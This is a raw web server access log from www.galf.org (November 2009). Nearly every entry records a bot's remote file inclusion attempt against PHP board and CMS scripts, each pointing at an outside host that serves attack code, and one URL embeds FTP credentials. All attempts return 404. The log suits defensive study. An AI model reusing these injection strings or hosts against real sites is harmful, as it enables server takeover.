216.97.43.58 - - [02/Nov/2009:05:15:29 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:15:29 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:30 -0800] "GET /logs/access_090330.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:32 -0800] "GET /logs/access_090330.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:32 -0800] "GET /logs/access_090713.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:32 -0800] "GET /logs/access_090330.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:33 -0800] "GET /logs/access_090713.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:34 -0800] "GET /logs/access_090713.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:34 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:37 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:37 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:37 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:37 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:38 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:15:41 -0800] "GET /logs/access_090316.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:45 -0800] "GET /logs/access_090629.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:46 -0800] "GET /logs/access_090629.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:15:47 -0800] "GET /logs/access_090629.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.97.43.58 - - [02/Nov/2009:05:16:20 -0800] "GET /logs/access_091012.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.97.43.58 - - [02/Nov/2009:05:16:20 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.97.43.58 - - [02/Nov/2009:05:16:20 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:29 -0800] "GET /logs/access_090803.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:30 -0800] "GET /logs/access_090803.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:35 -0800] "GET /logs/access_090824.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:36 -0800] "GET /logs/access_090824.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:41 -0800] "GET /logs/access_090803.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:16:45 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:16:45 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:16:45 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [02/Nov/2009:05:16:52 -0800] "GET /logs/access_090824.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:16:52 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:05:17:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:05:17:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:05:17:22 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:17:40 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:17:40 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:17:48 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:17:48 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:17:48 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:17:51 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:17:51 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.93.57.123 - - [02/Nov/2009:05:17:57 -0800] "GET /logs/access_090518.log%20/?sourcedir=http://3gsmdb.com/opkt/.safe??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:29 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:29 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:29 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:34 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:38 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:38 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:38 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:42 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:43 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:43 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:44 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:44 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:18:44 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:18:57 -0800] "GET /logs/access_090316.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:19:04 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:19:04 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:19:04 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:19:07 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:19:17 -0800] "GET /logs/access_090316.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:19:31 -0800] "GET /logs/access_090406.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:19:38 -0800] "GET /logs/access_090316.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:20:30 -0800] "GET /logs/access_090907.log/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:20:30 -0800] "GET /logs/access_090420.log/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:20:30 -0800] "GET /logs/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:20:30 -0800] "GET /skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.38 - - [02/Nov/2009:05:21:02 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {9293B601-C602-46C2-BC54-6D94B08C5BAB}; .NET CLR 1.1.4322)" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:05 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:07 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:21:15 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:21:21 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:27 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:27 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:27 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:21:48 -0800] "GET /logs/access_090420.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:21:56 -0800] "GET /logs/access_090420.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:21:59 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:00 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:00 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:06 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:06 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:08 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:15 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.255.101 - - [02/Nov/2009:05:22:16 -0800] "GET /logs///admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.239.255.101 - - [02/Nov/2009:05:22:16 -0800] "GET //admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:18 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:21 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:21 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:23 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:23 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:43 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:43 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:44 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:22:44 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:23:05 -0800] "GET /logs/access_090316.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:23:15 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:23:18 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:23:38 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
